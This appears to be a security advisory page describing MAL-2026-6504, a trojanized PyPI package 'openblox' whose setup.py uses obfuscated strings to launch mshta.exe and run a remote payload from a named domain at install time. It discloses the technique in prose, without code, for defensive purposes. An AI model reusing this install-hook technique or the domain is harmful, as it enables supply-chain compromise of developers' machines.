MAL-2026-6504: Malicious code in openblox (PyPI)
The openblox PyPI package versions 1.0.0 and 1.0.1 contain malicious code that executes during installation. The setup.py script runs a function that constructs and executes a command to launch mshta.exe with a remote URL, causing the download and execution of remote malicious code. The package masquerades as a Roblox-related library but actually contains unrelated code and obfuscated commands to evade detection.
AI Analysis
Technical Summary
The openblox package on PyPI, specifically versions 1.0.0 and 1.0.1, includes a malicious setup.py script that unconditionally executes a function at install time. This function reconstructs obfuscated strings to form a command invoking the Windows mshta.exe utility to fetch and run a remote HTA/JScript payload from https://fixars.top. This results in arbitrary code execution on the installer's machine. The obfuscation uses character arithmetic to hide the URL and command from static analysis. The package also uses misleading metadata and a Roblox-themed name to attract users intending to install a legitimate library, effectively acting as a trojanized package.
Potential Impact
Installing the affected versions of the openblox package leads to arbitrary code execution on the victim's Windows machine via mshta.exe executing a remote script. This can allow an attacker to run any code with the privileges of the user performing the installation, potentially leading to full system compromise or further malware deployment.
Mitigation Recommendations
No official patch or remediation is currently documented. Users should avoid installing the openblox package versions 1.0.0 and 1.0.1 from PyPI. Verify package authenticity before installation and consider using trusted package sources or mirrors. Monitor for updates from the package maintainer or PyPI for any official fixes or removals.
MAL-2026-6504: Malicious code in openblox (PyPI)
Description
The openblox PyPI package versions 1.0.0 and 1.0.1 contain malicious code that executes during installation. The setup.py script runs a function that constructs and executes a command to launch mshta.exe with a remote URL, causing the download and execution of remote malicious code. The package masquerades as a Roblox-related library but actually contains unrelated code and obfuscated commands to evade detection.
Affected software
Run on your own infrastructure? Check whether these packages are installed with threat-finder — our free open-source scanner.
AI-Powered Analysis
Machine-generated threat intelligence
Technical Analysis
The openblox package on PyPI, specifically versions 1.0.0 and 1.0.1, includes a malicious setup.py script that unconditionally executes a function at install time. This function reconstructs obfuscated strings to form a command invoking the Windows mshta.exe utility to fetch and run a remote HTA/JScript payload from https://fixars.top. This results in arbitrary code execution on the installer's machine. The obfuscation uses character arithmetic to hide the URL and command from static analysis. The package also uses misleading metadata and a Roblox-themed name to attract users intending to install a legitimate library, effectively acting as a trojanized package.
Potential Impact
Installing the affected versions of the openblox package leads to arbitrary code execution on the victim's Windows machine via mshta.exe executing a remote script. This can allow an attacker to run any code with the privileges of the user performing the installation, potentially leading to full system compromise or further malware deployment.
Mitigation Recommendations
No official patch or remediation is currently documented. Users should avoid installing the openblox package versions 1.0.0 and 1.0.1 from PyPI. Verify package authenticity before installation and consider using trusted package sources or mirrors. Monitor for updates from the package maintainer or PyPI for any official fixes or removals.
Technical Details
- Gcve Source
- db.gcve.eu
- Osv Id
- MAL-2026-6504
- Osv Schema Version
- 1.7.4
- Aliases
- []
- Ecosystems
- ["PyPI"]
- Database Specific Severity
- null
- Cvss Version
- null
Threat ID: 6a3ef7b127e9c79719ffb933
Added to database: 06/26/2026, 22:05:37 UTC
Last enriched: 06/26/2026, 22:30:27 UTC
Last updated: 06/26/2026, 22:30:27 UTC
Views: 2
Community Reviews
0 reviewsCrowdsource mitigation strategies, share intel context, and vote on the most helpful responses. Sign in to add your voice and help keep defenders ahead.
Want to contribute mitigation steps or threat intel context? Sign in or create an account to join the community discussion.
Actions
Updates to AI analysis require Pro Console access. Upgrade inside Console → Billing.
Need more coverage?
Upgrade to Pro Console for AI refresh and higher limits.
For incident response and remediation, OffSeq services can help resolve threats faster.
Latest Threats
Check if your credentials are on the dark web
Instant breach scanning across billions of leaked records. Free tier available.